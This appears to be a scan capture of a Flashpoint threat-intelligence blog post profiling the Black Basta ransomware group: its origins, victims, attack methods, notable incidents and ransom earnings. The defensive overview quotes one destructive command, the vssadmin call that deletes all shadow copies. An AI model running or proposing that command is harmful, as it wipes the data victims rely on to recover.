flashpoint.io
Open in
urlscan Pro
2606:4700::6812:fe2
Public Scan
URL:
https://flashpoint.io/blog/understanding-black-basta-ransomware/
Submission: On May 29 via api from TR — Scanned from DE
Submission: On May 29 via api from TR — Scanned from DE
Form analysis 3 forms found in the DOM
GET https://flashpoint.io/
<form role="search" method="get" id="searchBox" class="searchbox" action="https://flashpoint.io/">
<input type="search" placeholder="Search for topics, resources and solutions" value="" name="s" required="">
<button type="submit" form="searchBox" class="search-submit"><img src="https://flashpoint.io/wp-content/themes/flashpoint/img/icon-search.svg" type="image/svg+xml"></button>
</form>GET https://flashpoint.io/
<form role="search" method="get" id="searchScrollBox" class="searchbox" action="https://flashpoint.io/">
<input type="search" placeholder="What do you want to search for?" value="" name="s" required="">
<button type="submit" form="searchScrollBox" class="search-submit"><img src="https://flashpoint.io/wp-content/themes/flashpoint/img/icon-search.svg" type="image/svg+xml"></button>
</form>POST //translate.googleapis.com/translate_voting?client=te
<form id="goog-gt-votingForm" action="//translate.googleapis.com/translate_voting?client=te" method="post" target="votingFrame" class="VIpgJd-yAWNEb-hvhgNd-aXYTce"><input type="text" name="sl" id="goog-gt-votingInputSrcLang"><input type="text"
name="tl" id="goog-gt-votingInputTrgLang"><input type="text" name="query" id="goog-gt-votingInputSrcText"><input type="text" name="gtrans" id="goog-gt-votingInputTrgText"><input type="text" name="vote" id="goog-gt-votingInputVote"></form>Text Content
* Platform
Products
* Flashpoint Ignite
Cyber Threat Intelligence
Vulnerability Management (VulnDB)
Physical Security Intelligence
National Security Intelligence
Managed Attribution
Services
* Managed Intelligence
Curated Alerting
Proactive Acquisitions
Tailored Reporting Service
Request for Information (RFI)
* Professional Services
Threat Response & Readiness
Threat Actor Engagment & Procurement
Extortion Monitoring
* Solutions
By Threats and Risks
* Fraud
* Ransomware
* Account Takeover
* Brand and Reputation
* Vulnerability
* Physical Security
* National Security
By Industry
* Financial Services
* Retail
* Healthcare & Pharmaceuticals
* Technology
* Public Sector & National Security
* Resources
Case study
How Flashpoint Helped CSI (NY) Stop a Potential Synagogue Attack
* Threat Intel Blog
* Events & Webinars
* Resource Library
* Cybersecurity Glossary
* Partners
* Why Flashpoint
* Company
* About Us
* Careers
* News
* Contact Us
* Get a Demo
* Log in
* ▼
*
Why Flashpoint?
* Products
* Flashpoint Ignite
* Cyber Threat Intelligence
* Vulnerability Management (VulnDB)
* Physical Security Intelligence
* National Security Intelligence
* Managed Attribution
* Services
* Ransomware Attack Response and Readiness
* Professional Services
* Tailored Reporting
* Curated Alerting
* Managed Intelligence
* Request for Information
Solutions
* By Threats and Risks
* Financial Fraud
* Ransomware and Data Extortion
* Account Takeover
* Brand Reputation
* Vulnerability
* Physical Security
* National Security
* By Industry
* Financial Services
* Retail
* Healthcare & Pharmaceutical
* Technology
* Public Sector & National Security
Resource Library
* Threat Intelligence Blog
* Events & Webinars
* Resource Library
* Cybersecurity & Intelligence 101
* Partner With Flashpoint
Company
* About Us
* Flashpoint Careers
* Flashpoint News
* Contact Us
* Platform
Products
* Flashpoint Ignite
Cyber Threat Intelligence
Vulnerability Management (VulnDB)
Physical Security Intelligence
National Security Intelligence
Managed Attribution
Services
* Managed Intelligence
Curated Alerting
Proactive Acquisitions
Tailored Reporting Service
Request for Information (RFI)
* Professional Services
Threat Response & Readiness
Threat Actor Engagment & Procurement
Extortion Monitoring
* Solutions
By Threats and Risks
* Fraud
* Ransomware
* Account Takeover
* Brand and Reputation
* Vulnerability
* Physical Security
* National Security
By Industry
* Financial Services
* Retail
* Healthcare & Pharmaceuticals
* Technology
* Public Sector & National Security
* Resources
Case study
How Flashpoint Helped CSI (NY) Stop a Potential Synagogue Attack
* Threat Intel Blog
* Events & Webinars
* Resource Library
* Cybersecurity Glossary
* Partners
* Why Flashpoint
* Company
* About Us
* Careers
* News
* Contact Us
* Get a Demo
* Log in
*
*
Blogs
BLOG
FROM ORIGINS TO OPERATIONS: UNDERSTANDING BLACK BASTA RANSOMWARE
Since its emergence in 2022, Black Basta has targeted over 500 organizations
worldwide, leveraging sophisticated tactics to become a leading ransomware
threat. Here’s a look at their methods of operation, notable attacks, and the
potential future of this formidable cybercriminal group.
SHARE THIS:
Flashpoint Intel Team
May 28, 2024
Table Of Contents
Table of Contents
What is Black Basta?
History and background
Global impact
How Black Basta attacks
Increasing sophistication and activity
Notable attacks
Financial impact
The future of Black Basta
Take action against ransomware threats
WHAT IS BLACK BASTA?
Black Basta is a ransomware group that has rapidly risen to prominence in the
cyber threat landscape since its first appearance in April 2022. Known for its
highly targeted and sophisticated attacks, Black Basta operates as a
Ransomware-as-a-Service (RaaS) enterprise. It most recently made news for
breaching over 500 organizations worldwide. Its victims have included critical
infrastructure sectors, according to a joint report by CISA and the FBI.
While some ransomware operators employ a scattergun approach, Black Basta
meticulously selects its victims to maximize each attack’s impact.
The group is believed to be composed of former members of the infamous
ransomware groups Conti and REvil. This connection is suggested by the
similarities in their tactics, techniques, and procedures (TTPs), as well as
their rapid establishment and effectiveness in the cybercriminal ecosystem. Like
other infamous ransomware groups, Black Basta’s operations are characterized by
their use of double extortion tactics, where they encrypt a victim’s data and
threaten to release sensitive information on their public leak site if the
ransom is not paid.
HISTORY AND BACKGROUND
Black Basta made its public debut with a series of attacks in late April 2022,
just a couple months after Conti ceased operations in February 2022. One of its
earliest victims was the German wind energy company Deutsche Windtechnik.
However, there are indications that the group may have been active as early as
February 2022.
Since its inception, Black Basta has been highly active, amassing over 500
victims as of May 2024. The group utilizes top-tier hacking forums such as
Exploit and XSS to seek insiders within target organizations to facilitate
administrative access to networks.
Number of victim posts published by Black Basta by month since April 2022.
Source: Flashpoint.
GLOBAL IMPACT
Black Basta’s reach and impact are substantial, with the group targeting various
sectors, including critical infrastructure. The group primarily targets
organizations in the United States, Japan, Canada, the United Kingdom,
Australia, and New Zealand.
According to a joint advisory from the Cybersecurity and Infrastructure Security
Agency (CISA), the Federal Bureau of Investigation (FBI), the Department of
Health and Human Services (HHS), and the Multi-State Information Sharing and
Analysis Center (MS-ISAC), Black Basta has compromised over 500 organizations
worldwide. Their victims span 12 out of 16 critical infrastructure sectors,
including healthcare, public health, and energy.
HOW BLACK BASTA ATTACKS
Black Basta’s operations are characterized by their sophisticated and methodical
approach to ransomware attacks. The group leverages a combination of advanced
techniques and tools to infiltrate, compromise, and extort their targets.
INITIAL ACCESS
Black Basta employs several strategies to gain initial access to target
networks:
* Spear-Phishing Campaigns: In its early campaigns, Black Basta used highly
targeted spear-phishing emails to trick individuals into divulging their
credentials or downloading malicious attachments.
* Insider Information: The group is known to use illicit forums like Exploit
and XSS to recruit insiders within target organizations, offering significant
financial incentives for network access.
* Buying Network Access: Black Basta has advertised on forums their intent to
purchase corporate network access, collaborating with initial access brokers
(IABs) to infiltrate target systems.
Ransomware text that is installed following encryption. (Source: Minerva Labs)
LATERAL MOVEMENT AND CREDENTIAL HARVESTING
Once inside a network, Black Basta employs a range of tactics to move laterally
and harvest credentials:
* QakBot (QBot): Black Basta uses QakBot to steal credentials and gather
information. QakBot is a versatile malware that can perform actions like
brute-forcing, web injects, and loading other malware.
* Mimikatz: This tool is used for credential dumping to extract passwords from
memory.
* Exploiting Vulnerabilities: The group exploits known vulnerabilities such as
ZeroLogon, NoPac, and PrintNightmare to escalate privileges within the
network.
* Native Windows Tools: Black Basta utilizes tools like Windows Management
Instrumentation (WMI), PowerShell, and PsExec to execute commands and move
laterally across the network.
COMMAND AND CONTROL (C2)
For maintaining control over compromised systems, Black Basta uses various tools
and methods:
* Cobalt Strike Beacons: This commercial penetration testing tool is frequently
used for C2 operations, allowing the attackers to manage compromised systems
remotely.
* SystemBC: Used as a C2 proxy to hide traffic and communicate with the
infected systems.
* Rclone: A tool for data exfiltration, enabling the attackers to transfer
stolen data to remote locations.
DATA EXFILTRATION AND ENCRYPTION
Before encrypting files, Black Basta takes steps to maximize their leverage:
* Disabling Security Tools: The group uses PowerShell scripts to disable
antivirus products and endpoint detection and response (EDR) tools.
* Deleting Shadow Copies: To prevent recovery, they delete shadow copies using
the command “vssadmin.exe delete shadows /all /quiet”.
* Data Exfiltration: Tools like Rclone and WinSCP are used to exfiltrate
sensitive data before encryption.
ENCRYPTION
To ensure maximum disruption, they meticulously execute the encryption phase:
* Encryption Payload: Black Basta’s ransomware payload encrypts files using the
XChaCha20 algorithm. They have transitioned from using the GNU Multiple
Precision Arithmetic Library (GMP) to the Crypto++ encryption library.
* File Extensions and Ransom Note: Encrypted files are appended with a “.basta”
extension. A ransom note, typically named “readme.txt”, is placed on the
victim’s desktop, directing them to a .onion site for ransom negotiations.
* Advanced Obfuscation: The latest versions of their ransomware use heavy
obfuscation and randomized filenames to evade detection by EDR products.
INCREASING SOPHISTICATION AND ACTIVITY
Black Basta continuously evolves its techniques to stay ahead of security
measures. Recently, the group has adopted a combination of email DDoS and
vishing (voice phishing) tactics. They flood targets with spam emails and then
call them posing as IT support, convincing them to install remote access tools
like AnyDesk or use Windows Quick Assist. Once access is gained, Black Basta
executes batch scripts that appear as legitimate updates to establish
persistence and exfiltrate credentials using Secure Copy Protocol (SCP).
Black Basta has expanded its operations to include Linux-based VMware ESXi
virtual machines, using the ChaCha20 encryption algorithm. According to recent
intelligence and advisories from agencies like CISA and the FBI, Black Basta is
becoming increasingly sophisticated in its attacks. The group has been linked to
other major ransomware players such as FIN7, indicating a possible collaboration
or shared resources. Their use of advanced techniques and tools, combined with
their ability to adapt quickly, makes them a formidable threat in the
cybersecurity landscape.
NOTABLE ATTACKS
HYUNDAI EUROPE (APRIL 2022)
One of Black Basta’s earliest and most significant attacks targeted Hyundai
Europe, which led to significant operational disruptions and data breaches
within Hyundai’s European operations.
CAPITA (MARCH 2023)
UK-based outsourcing firm Capita fell victim to a Black Basta ransomware attack
In March 2023, which they reported directly cost them approximately $32 million.
The company also shared that indirect losses related to the attack, like
goodwill impairment, led to additional losses of upwards of $100 million
TORONTO PUBLIC LIBRARY (OCTOBER 2023)
The Toronto Public Library faced significant outages due to a Black Basta
ransomware attack that disrupted library services and affected access to public
resources.
CHILEAN GOVERNMENT CUSTOMS AGENCY (OCTOBER 2023)
The Chilean government issued a warning following a ransomware attack by Black
Basta on its customs agency. They reported that thanks to the work of their IT
teams, the incident would not affect the operational continuity of the Service.
THE AMERICAN DENTAL ASSOCIATION (APRIL 2022)
The American Dental Association experienced an attack from Black Basta that
forced them to take affected systems offline. The attack disrupted online
services, telephones, email, and webchat.
FINANCIAL IMPACT
Black Basta’s attacks have had profound effects on various sectors, including
automotive, outsourcing, public services, government, healthcare, and
telecommunications. Their attacks typically involve both encrypting data and
exfiltrating sensitive information. They hold this information hostage and
threaten to release it publicly unless they receive the ransom. This double
extortion tactic significantly increases the pressure on victims to comply with
ransom demands.
In late 2023, it was reported that Black Basta had accumulated at least $107
million in Bitcoin ransom payments.
THE FUTURE OF BLACK BASTA
Black Basta is poised to remain a significant ransomware threat, driven by their
ability to adapt and innovate. They are likely to continue refining their attack
methods, increasing their use of sophisticated social engineering tactics such
as email DDoS and vishing to gain access to networks. The incorporation of
advanced malware and the targeting of diverse platforms, including cloud
environments and IoT devices, are expected to enhance their capabilities.
Financial incentives remain a powerful motivator for Black Basta. With over $107
million in ransom payments, ransomware continues to be highly lucrative.
Collaboration with other cybercriminal groups could become more structured,
leading to the formation of ransomware cartels. These alliances might result in
more coordinated attacks and the sharing of advanced tools and techniques. Black
Basta’s connections with groups like FIN7 suggest further integration with
advanced persistent threats (APTs), providing them with state-sponsored tools
and expertise.
Law enforcement actions and improved defensive measures will also influence the
future of Black Basta. Intensified efforts by agencies like CISA and the FBI
could disrupt their operations, forcing the group to adapt or rebrand. As
organizations enhance their cybersecurity defenses, Black Basta will need to
innovate continuously to overcome these improved measures.
TAKE ACTION AGAINST RANSOMWARE THREATS
Flashpoint helps organizations deeply understand malware capabilities, origins,
and associated communication channels, along with tracking ransomware groups’
primary source communications, announcements about new victims, and trends
across victims, industries and locations. Gain insights into criminal
activities, dark web forums, and marketplaces, and expose the whereabouts of
threat actors, information leaks, encrypted chats, ransomware data leak sites,
vulnerabilities and victim auction marketplaces.
Discover how Flashpoint’s advanced threat intelligence and comprehensive
security solutions can safeguard your critical assets. Don’t wait for an
attack—be proactive and prepared. Sign up for a demo to see Flashpoint in
action.
BEGIN YOUR FREE TRIAL TODAY.
Get a Free Trial
Contact Sales
6218 Georgia Avenue NW
Suite #1
PMB 3032
Washington, DC, 20011
United States
+1 (888) 468-3598
Contact us
*
*
*
* Platform
* Products
* Flashpoint Ignite
* Cyber Threat Intelligence
* Vulnerability Management (VulnDB)
* Physical Security Intelligence
* National Security Intelligence
* Managed Attribution
* Services
* Managed Intelligence
* Curated Alerting
* Proactive Acquisitions
* Tailored Reporting Service
* Request for Information (RFI)
* Professional Services
* Threat Response and Analysis
* Threat Actor Engagement & Procurement
* Extortion Monitoring
* Solutions
* By Threats & Risks
* Ransomware
* Financial Fraud
* Account Takeover
* Brand Risks
* Vulnerability Risks
* Physical Security Threats
* Geopolitical Risk
* By Industry
* Financial Services
* Retail
* Healthcare & Pharmaceutical
* Technology
* Public Sector & National Security
* Menu Item
* Why Flashpoint
* Resources
* Threat Intelligence Blog
* Events & Webinars
* Resource Library
* Cybersecurity Glossary
* Partners
* Company
* About Us
* Careers
* News
* Contact Us
© 2024 Flashpoint. All rights reserved.
* Privacy Policy
* Terms of Service
* Cookie Policy
* CCPA
* Legal
Originaltext
Diese Übersetzung bewerten
Mit deinem Feedback können wir Google Übersetzer weiter verbessern
By clicking “Accept All Cookies”, you agree to the storing of cookies on your
device to enhance site navigation, analyze site usage, and assist in our
marketing efforts. Cookie Policy
Accept All Cookies
Cookies Settings
PRIVACY PREFERENCE CENTER
When you visit any website, it may store or retrieve information on your
browser, mostly in the form of cookies. This information might be about you,
your preferences or your device and is mostly used to make the site work as you
expect it to. The information does not usually directly identify you, but it can
give you a more personalized web experience. Because we respect your right to
privacy, you can choose not to allow some types of cookies. Click on the
different category headings to find out more and change our default settings.
However, blocking some types of cookies may impact your experience of the site
and the services we are able to offer.
More information
Allow All
MANAGE CONSENT PREFERENCES
STRICTLY NECESSARY COOKIES
Always Active
These cookies are necessary for the website to function and cannot be switched
off in our systems. They are usually only set in response to actions made by you
which amount to a request for services, such as setting your privacy
preferences, logging in or filling in forms. You can set your browser to
block or alert you about these cookies, but some parts of the site will not then
work. These cookies do not store any personally identifiable information.
Cookies Details
FUNCTIONAL COOKIES
Functional Cookies
These cookies enable the website to provide enhanced functionality and
personalisation. They may be set by us or by third party providers whose
services we have added to our pages. If you do not allow these cookies then
some or all of these services may not function properly.
Cookies Details
PERFORMANCE COOKIES
Performance Cookies
These cookies allow us to count visits and traffic sources so we can measure and
improve the performance of our site. They help us to know which pages are the
most and least popular and see how visitors move around the site. All
information these cookies collect is aggregated and therefore anonymous. If you
do not allow these cookies we will not know when you have visited our site, and
will not be able to monitor its performance.
Cookies Details
TARGETING COOKIES
Targeting Cookies
These cookies may be set through our site by our advertising partners. They may
be used by those companies to build a profile of your interests and show you
relevant adverts on other sites. They do not store directly personal
information, but are based on uniquely identifying your browser and internet
device. If you do not allow these cookies, you will experience less targeted
advertising.
Cookies Details
Back Button
COOKIE LIST
Search Icon
Filter Icon
Clear
checkbox label label
Apply Cancel
Consent Leg.Interest
checkbox label label
checkbox label label
checkbox label label
Confirm My Choices